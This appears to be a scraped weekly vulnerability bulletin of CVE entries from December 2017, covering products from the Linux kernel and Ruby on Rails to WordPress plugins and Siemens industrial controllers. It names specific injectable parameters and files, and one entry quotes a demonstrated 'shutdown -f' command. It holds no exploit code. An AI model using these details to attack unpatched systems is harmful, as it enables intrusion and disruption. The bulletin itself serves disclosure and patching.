The einj_error_inject function in drivers/acpi/apei/einj.c in the Linux kernel allows local users to simulate hardware errors and consequently cause a denial of service by leveraging failure to disable APEI error injection through EINJ when securelevel is set.2017-12-29not yet calculatedCVE-2016-3695
CONFIRM
CONFIRM
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging register truncation mishandling.2017-12-27not yet calculatedCVE-2017-16996
MISC
MISC
BID
MISC
MISC
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a "pointer leak."2017-12-27not yet calculatedCVE-2017-17864
SECTRACK
MISC
MISC
DEBIAN
magento -- magento
 
Magento Community Edition and Enterprise Edition before 2.0.10 and 2.1.x before 2.1.2 have XSS via e-mail templates that are mishandled during a preview, aka APPSEC-1503.2017-12-30not yet calculatedCVE-2016-10704
CONFIRM
mediawiki -- mediawiki
 
The OAuth extension for MediaWiki improperly negotiates a new client token only over Special:OAuth/initiate, which allows attackers to bypass intended IP address access restrictions by making an API request with an existing token.2017-12-29not yet calculatedCVE-2015-8008
FEDORA
FEDORA
FEDORA
MLIST
BID
SECTRACK
CONFIRM
MLIST
CONFIRM
mistune -- mistune
 
Cross-site scripting (XSS) vulnerability in the _keyify function in mistune.py in Mistune before 0.8.1 allows remote attackers to inject arbitrary web script or HTML by leveraging failure to escape the "key" argument.2017-12-29not yet calculatedCVE-2017-16876
CONFIRM
CONFIRM
CONFIRM
FEDORA
mozilla -- network_security_services
 
Heap-based buffer overflow in the __hash_open function in lib/dbm/src/hash.c in Mozilla Network Security Services (NSS) allows context-dependent attackers to have unspecified impact using a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11696
MISC
FULLDISC
MISC
BID
SECTRACK
mozilla -- network_security_services
 
Heap-based buffer overflow in the __get_page function in lib/dbm/src/h_page.c in Mozilla Network Security Services (NSS) allows context-dependent attackers to have unspecified impact using a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11698
MISC
FULLDISC
MISC
BID
SECTRACK
mozilla -- network_security_services
 
The __hash_open function in hash.c:229 in Mozilla Network Security Services (NSS) allows context-dependent attackers to cause a denial of service (floating point exception and crash) via a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11697
MISC
FULLDISC
MISC
BID
SECTRACK
mozilla -- network_security_services
 
Heap-based buffer overflow in the alloc_segs function in lib/dbm/src/hash.c in Mozilla Network Security Services (NSS) allows context-dependent attackers to have unspecified impact using a crafted cert8.db file.2017-12-27not yet calculatedCVE-2017-11695
MISC
FULLDISC
MISC
BID
SECTRACK
mqtt.js -- mqtt.js
 
MQTT.js 2.x.x prior to 2.15.0 issue in handling PUBLISH tickets may lead to an attacker causing a denial-of-service condition.2017-12-27not yet calculatedCVE-2017-10910
MISC
MISC
JVN
nettransport_download_manager -- nettransport_download_manager 
 
A buffer overflow vulnerability in NetTransport.exe in NetTransport Download Manager 2.96L and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long HTTP response.2017-12-29not yet calculatedCVE-2017-17968
EXPLOIT-DB
netwin -- surgeftp
 
cgi/surgeftpmgr.cgi (aka the Web Manager interface on TCP port 7021 or 9021) in NetWin SurgeFTP version 23f2 has XSS via the classid, domainid, or username parameter.2017-12-29not yet calculatedCVE-2017-17933
MISC
open-iscsi -- open-iscsi
 
An issue was discovered in Open-iSCSI through 2.0.875. A local attacker can cause the iscsiuio server to abort or potentially execute code by sending messages with incorrect lengths, which (due to lack of checking) can lead to buffer overflows, and result in aborts (with overflow checking enabled) or code execution. The process_iscsid_broadcast function in iscsiuio/src/unix/iscsid_ipc.c does not validate the payload length before a write operation.2017-12-27not yet calculatedCVE-2017-17840
MISC
MISC
opencv -- opencv
 
OpenCV 3.3.1 has a Buffer Overflow in the cv::PxMDecoder::readData function in grfmt_pxm.cpp, because an incorrect size value is used.2017-12-29not yet calculatedCVE-2017-17760
MISC
MISC
oracle -- jarsigner
 
jarsigner in OpenJDK and Oracle Java SE before 7u51 allows remote attackers to bypass a code-signing protection mechanism and inject unsigned bytecode into a signed JAR file by leveraging improper file validation.2017-12-29not yet calculatedCVE-2013-4578
CONFIRM
MLIST
MLIST
REDHAT
CONFIRM
pdf-xchange_viewer -- pdf-xchange_viewer
 
The launchURL function in PDF-XChange Viewer 2.5 (Build 314.0) might allow remote attackers to execute arbitrary code via a crafted PDF file.2017-12-27not yet calculatedCVE-2017-13056
MISC
phpjabbers -- file_sharing_script
 
PHPJabbers File Sharing Script 1.0 has stored XSS in the comments section.2017-12-30not yet calculatedCVE-2017-12813
MISC
phpjabbers -- night_club_booking_software
 
PHPJabbers Night Club Booking Software has stored XSS in the name parameter in the reservations tab.2017-12-30not yet calculatedCVE-2017-12812
MISC
phpjabbers -- php_newsletter_script
 
PHPJabbers PHP Newsletter Script 4.2 has stored XSS in lists in the admin panel.2017-12-30not yet calculatedCVE-2017-12810
MISC
phpjabbers -- star_rating_script
 
PHPJabbers Star Rating Script 4.0 has stored XSS via a rating item.2017-12-30not yet calculatedCVE-2017-12811
MISC
phpmybackuppro -- phpmybackuppro
 
SQL injection vulnerability in phpMyBackupPro when run in multi-user mode before 2.5 allows remote attackers to execute arbitrary SQL commands via the username and password parameters.2017-12-27not yet calculatedCVE-2015-3637
MLIST
SECTRACK
phpscriptsmall.com -- muslim_matrimonial_scriptPHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/event_edit.php edit_id parameter.2017-12-29not yet calculatedCVE-2017-17984
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/state_view.php cou_id parameter.2017-12-29not yet calculatedCVE-2017-17985
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/slider_edit.php edit_id parameter.2017-12-29not yet calculatedCVE-2017-17981
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
PHP Scripts Mall Muslim Matrimonial Script allows arbitrary file upload via admin/mydetails_edit.php.2017-12-29not yet calculatedCVE-2017-17987
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/caste_view.php comm_id parameter.2017-12-29not yet calculatedCVE-2017-17986
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
PHP Scripts Mall Muslim Matrimonial Script has SQL injection via the view-profile.php mem_id parameter.2017-12-29not yet calculatedCVE-2017-17983
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
PHP Scripts Mall Muslim Matrimonial Script has CSRF via admin/subadmin_edit.php.2017-12-29not yet calculatedCVE-2017-17982
MISC
phpscriptsmall.com -- muslim_matrimonial_script
 
PHP Scripts Mall Muslim Matrimonial Script has XSS via the admin/event_add.php event_title parameter.2017-12-29not yet calculatedCVE-2017-17988
MISC
phpscriptsmall.com -- php_scripts_mall_car_rental_script
 
PHP Scripts Mall Car Rental Script has CSRF via admin/sitesettings.php.2017-12-27not yet calculatedCVE-2017-17905
MISC
phpscriptsmall.com -- php_scripts_mall_car_rental_script
 
PHP Scripts Mall Car Rental Script has XSS via the admin/areaedit.php carid parameter or the admin/sitesettings.php websitename parameter.2017-12-27not yet calculatedCVE-2017-17907
MISC
phpscriptsmall.com -- php_scripts_mall_car_rental_script
 
PHP Scripts Mall Car Rental Script has SQL Injection via the admin/carlistedit.php carid parameter.2017-12-27not yet calculatedCVE-2017-17906
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has XSS via the my_wishlist.php fid parameter.2017-12-28not yet calculatedCVE-2017-17958
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has a predicable registration URL, which makes it easier for remote attackers to register with an invalid or spoofed e-mail address.2017-12-28not yet calculatedCVE-2017-17952
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has XSS via the category.php chid1 parameter.2017-12-28not yet calculatedCVE-2017-17953
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommercePHP Scripts Mall PHP Multivendor Ecommerce has SQL Injection via the my_wishlist.php fid parameter.2017-12-28not yet calculatedCVE-2017-17957
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 
PHP Scripts Mall PHP Multivendor Ecommerce has CSRF via admin/sellerupd.php.2017-12-28not yet calculatedCVE-2017-17960
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 
PHP Scripts Mall PHP Multivendor Ecommerce has XSS via the admin/sellerupd.php companyname parameter.2017-12-28not yet calculatedCVE-2017-17956
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 
PHP Scripts Mall PHP Multivendor Ecommerce has SQL Injection via the seller-view.php usid parameter.2017-12-28not yet calculatedCVE-2017-17959
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 
PHP Scripts Mall PHP Multivendor Ecommerce has SQL Injection via the shopping-cart.php cusid parameter.2017-12-28not yet calculatedCVE-2017-17951
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 
PHP Scripts Mall PHP Multivendor Ecommerce has XSS via the shopping-cart.php cusid parameter.2017-12-28not yet calculatedCVE-2017-17955
MISC
phpscriptsmall.com -- php_scripts_mall_php_multivendor_ecommerce
 
PHP Scripts Mall PHP Multivendor Ecommerce has XSS via the seller-view.php usid parameter.2017-12-28not yet calculatedCVE-2017-17954
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 
PHP Scripts Mall Professional Service Script has XSS via the admin/general_settingupd.php website_title parameter.2017-12-27not yet calculatedCVE-2017-17925
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 
PHP Scripts Mall Professional Service Script allows remote attackers to obtain sensitive full-path information via the id parameter to admin/review_userwise.php.2017-12-27not yet calculatedCVE-2017-17924
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 
PHP Scripts Mall Professional Service Script has CSRF via admin/general_settingupd.php, as demonstrated by modifying a setting in the user panel.2017-12-27not yet calculatedCVE-2017-17930
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 
PHP Scripts Mall Professional Service Script has SQL injection via the admin/review.php id parameter.2017-12-27not yet calculatedCVE-2017-17928
MISC
phpscriptsmall.com -- php_scripts_mall_professional_services_script
 
PHP Scripts Mall Professional Service Script allows remote attackers to obtain sensitive full-path information via a crafted PATH_INFO to service-list/category/.2017-12-27not yet calculatedCVE-2017-17927
MISC
phpscriptsmall.com -- php_scripts_mall_responsive_realestate_script
 
PHP Scripts Mall Responsive Realestate Script has CSRF via admin/general.2017-12-27not yet calculatedCVE-2017-17908
MISC
phpscriptsmall.com -- php_scripts_mall_responsive_realestate_script
 
PHP Scripts Mall Responsive Realestate Script has XSS via the admin/general.php gplus parameter.2017-12-27not yet calculatedCVE-2017-17909
MISC
phpscriptsmall.com -- php_scripts_mall_resume_clone_script
 
PHP Scripts Mall Resume Clone Script has SQL Injection via the forget.php username parameter.2017-12-27not yet calculatedCVE-2017-17931
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_bookingPHP Scripts Mall Single Theater Booking has SQL Injection via the admin/movieview.php movieid parameter.2017-12-28not yet calculatedCVE-2017-17941
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_bookingPHP Scripts Mall Single Theater Booking has XSS via the title parameter to admin/sitesettings.php.2017-12-28not yet calculatedCVE-2017-17940
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_booking
 
PHP Scripts Mall Single Theater Booking has XSS via the admin/viewtheatre.php theatreid parameter.2017-12-28not yet calculatedCVE-2017-17938
MISC
phpscriptsmall.com -- php_scripts_mall_single_theater_booking
 
PHP Scripts Mall Single Theater Booking has CSRF via admin/sitesettings.php.2017-12-28not yet calculatedCVE-2017-17939
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 
Readymade Video Sharing Script has XSS via the search_video.php search parameter, the viewsubs.php chnlid parameter, or the user-profile-edit.php fname parameter.2017-12-27not yet calculatedCVE-2017-17893
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 
Readymade Video Sharing Script has SQL Injection via the viewsubs.php chnlid parameter or the search_video.php search parameter.2017-12-27not yet calculatedCVE-2017-17892
MISC
phpscriptsmall.com -- readymade_video_sharing_script
 
Readymade Video Sharing Script has CSRF via user-profile-edit.php.2017-12-27not yet calculatedCVE-2017-17891
MISC
phpscriptssmall.com -- php_scripts_mall_professional_services_script
 
PHP Scripts Mall Professional Service Script has XSS via the admin/bannerview.php view parameter.2017-12-27not yet calculatedCVE-2017-17929
MISC
phpscriptssmall.com -- php_scripts_mall_professional_services_script
 
PHP Scripts Mall Professional Service Script has a predicable registration URL, which makes it easier for remote attackers to register with an invalid or spoofed e-mail address.2017-12-27not yet calculatedCVE-2017-17926
MISC
rawstudio -- rawstudio
 
The rs_filter_graph function in librawstudio/rs-filter.c in rawstudio might allow local users to truncate arbitrary files via a symlink attack on (1) /tmp/rs-filter-graph.png or (2) /tmp/rs-filter-graph.2017-12-29not yet calculatedCVE-2014-4978
FEDORA
MLIST
BID
CONFIRM
CONFIRM
XF
CONFIRM
red_hat -- hawt.io 
 
The admin terminal in Hawt.io does not require authentication, which allows remote attackers to execute arbitrary commands via the k parameter.2017-12-29not yet calculatedCVE-2014-0121
CONFIRM
CONFIRM
MISC
red_hat -- hawt.io 
 
Cross-site request forgery (CSRF) vulnerability in the admin terminal in Hawt.io allows remote attackers to hijack the authentication of arbitrary users for requests that run commands on the Karaf server, as demonstrated by running "shutdown -f."2017-12-29not yet calculatedCVE-2014-0120
CONFIRM
CONFIRM
MISC
red_hat -- fedora
 
The find_ifcfg_path function in netcf before 0.2.7 might allow attackers to cause a denial of service (application crash) via vectors involving augeas path expressions.2017-12-29not yet calculatedCVE-2014-8119
FEDORA
FEDORA
FEDORA
REDHAT
BID
CONFIRM
CONFIRM
red_lion -- hmi_panels
 
Red Lion HMI panels allow remote attackers to cause a denial of service (software exception) via an HTTP POST request to a long URI that does not exist, as demonstrated by version HMI 2.41 PLC 2.42.2017-12-30not yet calculatedCVE-2017-14855
MISC
rockwell_automation -- factorytalk_alarms_and_events
 
An Improper Input Validation issue was discovered in Rockwell Automation FactoryTalk Alarms and Events, Version 2.90 and earlier. An unauthenticated attacker with remote access to a network with FactoryTalk Alarms and Events can send a specially crafted set of packets packet to Port 403/TCP (the history archiver service), causing the service to either stall or terminate.2017-12-22not yet calculatedCVE-2017-14022
BID
MISC
ruby_on_rails -- ruby_on_rails SQL injection vulnerability in the 'order' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id desc' parameter.2017-12-29not yet calculatedCVE-2017-17919
MISC
ruby_on_rails -- ruby_on_rails 
 
SQL injection vulnerability in the 'where' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'id' parameter.2017-12-29not yet calculatedCVE-2017-17917
MISC
ruby_on_rails -- ruby_on_rails 
 
SQL injection vulnerability in the 'find_by' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'name' parameter.2017-12-29not yet calculatedCVE-2017-17916
MISC
ruby_on_rails -- ruby_on_rails 
 
SQL injection vulnerability in the 'reorder' method in Ruby on Rails 5.1.4 and earlier allows remote attackers to execute arbitrary SQL commands via the 'name' parameter.2017-12-29not yet calculatedCVE-2017-17920
MISC
samsung -- internet_browser
 
Samsung Internet Browser 6.2.01.12 allows remote attackers to bypass the Same Origin Policy, and conduct UXSS attacks to obtain sensitive information, via vectors involving an IFRAME element inside XSLT data in one part of an MHTML file. Specifically, JavaScript code in another part of this MHTML file does not have a document.domain value corresponding to the domain that is hosting the MHTML file, but instead has a document.domain value corresponding to an arbitrary URL within the content of the MHTML file.2017-12-27not yet calculatedCVE-2017-17859
MISC
samsung -- s6_edge
 
The SecEmailComposer/EmailComposer application in the Samsung S6 Edge before the October 2015 MR uses weak permissions for the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND service action, which might allow remote attackers with knowledge of the local email address to obtain sensitive information via a crafted application that sends a crafted intent.2017-12-27not yet calculatedCVE-2015-7889
MISC
BID
CONFIRM
EXPLOIT-DB
serverscheck_monitoring_software -- serverscheck_monitoring_software
 
ServersCheck Monitoring Software before 14.2.3 is prone to a cross-site scripting vulnerability as user supplied-data is not validated/sanitized when passed in the settings_SMS_ALERT_TYPE parameter, and JavaScript can be executed on settings-save.html (the Settings - SMS Alerts page).2017-12-27not yet calculatedCVE-2017-17832
MISC
CONFIRM
siemens -- 7kt_pac1200_data_manager
 
A vulnerability has been identified in Siemens 7KT PAC1200 data manager (7KT1260) in all versions < V2.03. The integrated web server (port 80/tcp) of the affected devices could allow an unauthenticated remote attacker to perform administrative operations over the network.2017-12-27not yet calculatedCVE-2017-9944
BID
CONFIRM
siemens -- logo!_soft_comfort
 
Siemens LOGO! Soft Comfort (All versions before V8.2) lacks integrity verification of software packages downloaded via an unprotected communication channel. This could allow a remote attacker to manipulate the software package while performing a Man-in-the-Middle (MitM) attack.2017-12-25not yet calculatedCVE-2017-12740
CONFIRM
siemens -- multiple_products
 
A vulnerability has been identified in the following Siemens industrial products: SIMATIC S7-200 Smart: All versions < V2.03.01, SIMATIC S7-400 PN V6: All versions < V6.0.6, SIMATIC S7-400 H V6: All versions < 6.0.8, SIMATIC S7-400 PN/DP V7: All versions, SIMATIC S7-410 V8: All versions, SIMATIC S7-300: All versions, SIMATIC S7-1200: All versions, SIMATIC S7-1500: All versions < 2.0, SIMATIC S7-1500 Software Controller: All versions < 2.0, SIMATIC WinAC RTX 2010 incl. F: All versions, SIMATIC ET 200AL: All versions, SIMATIC ET 200ecoPN: All versions, SIMATIC ET 200M: All versions, SIMATIC ET 200MP: All versions, SIMATIC ET 200pro: All versions, SIMATIC ET 200S: All versions, SIMATIC ET 200SP: All versions, DK Standard Ethernet Controller: All versions, EK-ERTEC 200P: All versions < V4.5, EK-ERTEC 200 PN IO: All versions, SIMOTION D: All versions < V5.1 HF1, SIMOTION C: All versions < V5.1 HF1, SIMOTION P: All versions < V5.1 HF1, SINAMICS DCM: All versions, SINAMICS DCP: All versions, SINAMICS G110M / G120(C/P/D) w. PN: All versions < V4.7 SP9 HF1, SINAMICS G130 and G150: All versions, SINAMICS S110 w. PN: All versions, SINAMICS S120: All versions, SINAMICS S150 V4.7 and V4.8: All versions, SINAMICS V90 w. PN: All versions, SINUMERIK 840D sl: All versions, SIMATIC Compact Field Unit: All versions, SIMATIC PN/PN Coupler: All versions, SIMOCODE pro V PROFINET: All versions, SIRIUS Soft starter 3RW44 PN: All versions. Specially crafted packets sent to port 161/UDP could cause a Denial-of-Service condition. The affected devices must be restarted manually.2017-12-25not yet calculatedCVE-2017-12741
BID
CONFIRM
siemens -- ruggedcom_ros_for_rsl910_devices
 
A vulnerability has been identified in the following Siemens products: RUGGEDCOM ROS for RSL910 devices: All versions < ROS v5.0.1, RUGGEDCOM ROS for all other devices: All versions < ROS v4.3.4, SCALANCE XB-200/XC-200/XP-200/XR300-WG: All versions >= v3.0, SCALANCE XR-500/XM-400: All versions >= v6.1. After initial configuration, the Ruggedcom Discovery Protocol (RCDP) is still able to write to the device under certain conditions, potentially allowing users located in the adjacent network of the targeted device to perform unauthorized administrative actions. | Published: 2017-12-25 | CVSS Score: not yet calculated | CVE-2017-12736
BID
SECTRACK
SECTRACK
CONFIRM
software_house -- istar_ultra_devices
 
A door-unlocking issue was discovered on Software House iStar Ultra devices through 6.5.2.20569 when used in conjunction with the IP-ACM Ethernet Door Module. The communications between the IP-ACM and the iStar Ultra is encrypted using a fixed AES key and IV. Each message is encrypted in CBC mode and restarts with the fixed IV, leading to replay attacks of entire messages. There is no authentication of messages beyond the use of the fixed AES key, so message forgery is also possible. | Published: 2017-12-30 | CVSS Score: not yet calculated | CVE-2017-17704
MISC
sony -- playstation
 
Untrusted search path vulnerability in Content Manager Assistant for PlayStation version 3.55.7671.0901 and earlier allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17010
JVN
synology -- mailplus_server
 
Cross-site scripting (XSS) vulnerability in User Policy editor in Synology MailPlus Server before 1.4.0-0415 allows remote authenticated users to inject arbitrary HTML via the name parameter. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-16768
CONFIRM
synology -- synology_chat
 
Multiple cross-site scripting (XSS) vulnerabilities in Slash Command Creator in Synology Chat before 2.0.0-1124 allow remote authenticated users to inject arbitrary web script or HTML via (1) COMMAND, (2) COMMANDS INSTRUCTION, or (3) DESCRIPTION parameter. | Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-15892
CONFIRM
synology -- synology_chat
 
Server-side request forgery (SSRF) vulnerability in Link Preview in Synology Chat before 2.0.0-1124 allows remote authenticated users to download arbitrary local files via a crafted URI. | Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-15886
CONFIRM
tripwire -- ip360_vne_manager
 
The RPC service in Tripwire (formerly nCircle) IP360 VnE Manager 7.2.2 before 7.2.6 allows remote attackers to bypass authentication and (1) enumerate users, (2) reset passwords, or (3) manipulate IP filter restrictions via crafted "privileged commands." | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2015-6237
FULLDISC
BUGTRAQ
typo3 -- typo3
 
The Direct Mail (direct_mail) extension before 3.1.2 for TYPO3 allows remote attackers to obtain sensitive information by leveraging improper checking of authentication codes. | Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2013-7400
MLIST
CONFIRM
MISC
ubiquiti -- unifi_video
 
Ubiquiti UniFi Video before 3.8.0 for Windows uses weak permissions for the installation directory, which allows local users to gain SYSTEM privileges via a Trojan horse taskkill.exe file. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2016-6914
MISC
FULLDISC
BID
MISC
EXPLOIT-DB
valve_steam_link -- valve_steam_link_build_643
 
An issue was discovered in Valve Steam Link build 643. Root passwords longer than 8 characters are truncated because of the default use of DES (aka the CONFIG_FEATURE_DEFAULT_PASSWD_ALGO="des" setting). | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17878
MISC
MISC
MISC
valve_steam_link -- valve_steam_link_build_643
 
An issue was discovered in Valve Steam Link build 643. When the SSH daemon is enabled for local development, the device is publicly available via IPv6 TCP port 22 over the internet (with stateless address autoconfiguration) by default, which makes it easier for remote attackers to obtain access by guessing 24 bits of the MAC address and attempting a root login. This can be exploited in conjunction with CVE-2017-17878. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17877
MISC
MISC
MISC
vanguard -- marketplace_digital_products_php
 
Vanguard Marketplace Digital Products PHP has CSRF via /search. | Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-17936
MISC
vanguard -- marketplace_digital_products_php
 
Vanguard Marketplace Digital Products PHP 1.4 allows arbitrary file upload via an "Add a new product" or "Add a product preview" action, which can make a .php file accessible under an uploads/ URI. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17874
EXPLOIT-DB
vanguard -- marketplace_digital_products_php
 
Vanguard Marketplace Digital Products PHP 1.4 has SQL Injection via the PATH_INFO to the /p URI. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17873
EXPLOIT-DB
vanguard -- marketplace_digital_products_php
 
Vanguard Marketplace Digital Products PHP has XSS via the phps_query parameter to /search. | Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-17937
MISC
webmin -- webmin
 
custom/run.cgi in Webmin before 1.870 allows remote authenticated administrators to conduct XSS attacks via the description field in the custom command functionality. | Published: 2017-12-30 | CVSS Score: not yet calculated | CVE-2017-17089
CONFIRM
wireshark -- wireshark
 
In Wireshark 2.2.11 and before, the MRDISC dissector misuses a NULL pointer. This was addressed in epan/dissectors/packet-mrdisc.c by validating an IPv4 address. This vulnerability is similar to CVE-2017-9343. | Published: 2017-12-30 | CVSS Score: not yet calculated | CVE-2017-17997
MISC
MISC
MISC
wireshark -- wireshark
 
The File_read_line function in epan/wslua/wslua_file.c in Wireshark through 2.2.11 does not properly strip '\n' characters, which allows remote attackers to cause a denial of service (buffer underflow and application crash) via a crafted packet that triggers the attempted processing of an empty line. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17935
BID
MISC
MISC
MISC
wordpress -- wordpress
 
The TheCartPress eCommerce Shopping Cart (aka The Professional WordPress eCommerce Plugin) plugin for WordPress before 1.3.9.3 allows remote attackers to obtain sensitive order detail information by leveraging a "broken authentication mechanism." | Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2015-3302
MISC
BUGTRAQ
BID
EXPLOIT-DB
MISC
wordpress -- wordpress
 
Multiple cross-site scripting (XSS) vulnerabilities in (1) templates/admanagement/admanagement.php and (2) templates/adspot/adspot.php in the ResAds plugin before 1.0.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the page parameter. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2015-7667
BUGTRAQ
CONFIRM
MISC
wordpress -- wordpress
 
The mgl-instagram-gallery plugin for WordPress has XSS via the single-gallery.php media parameter. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17869
MISC
wordpress -- wordpress
 
Multiple cross-site scripting (XSS) vulnerabilities in the (1) cp_updateMessageItem and (2) cp_deleteMessageItem functions in cp_ppp_admin_int_message_list.inc.php in the Payment Form for PayPal Pro plugin before 1.0.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the cal parameter. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2015-7666
BUGTRAQ
CONFIRM
CONFIRM
MISC
wordpress -- wordpress
 
Multiple directory traversal vulnerabilities in (1) includes/MapImportCSV2.php and (2) includes/MapImportCSV.php in the Easy2Map plugin before 1.3.0 for WordPress allow remote attackers to include and execute arbitrary files via the csvfile parameter related to "upload file functionality." | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2015-7669
BUGTRAQ
CONFIRM
MISC
wordpress -- wordpress
 
Cross-site scripting (XSS) vulnerability in includes/MapPinImageSave.php in the Easy2Map plugin before 1.3.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the map_id parameter. | Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2015-7668
BUGTRAQ
CONFIRM
MISC
zend_framework -- zend_framework
 
The Zend_Db_Select::order function in Zend Framework before 1.12.7 does not properly handle parentheses, which allows remote attackers to conduct SQL injection attacks via unspecified vectors. | Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2014-4914
CONFIRM
JVN
MLIST
SECUNIA
BID
DEBIAN
zyxel -- p-660hw_v3_devices
 
ZyXEL P-660HW v3 devices allow remote attackers to cause a denial of service (CPU consumption) via a flood of IP packets with a TTL of 1. | Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17901
MISC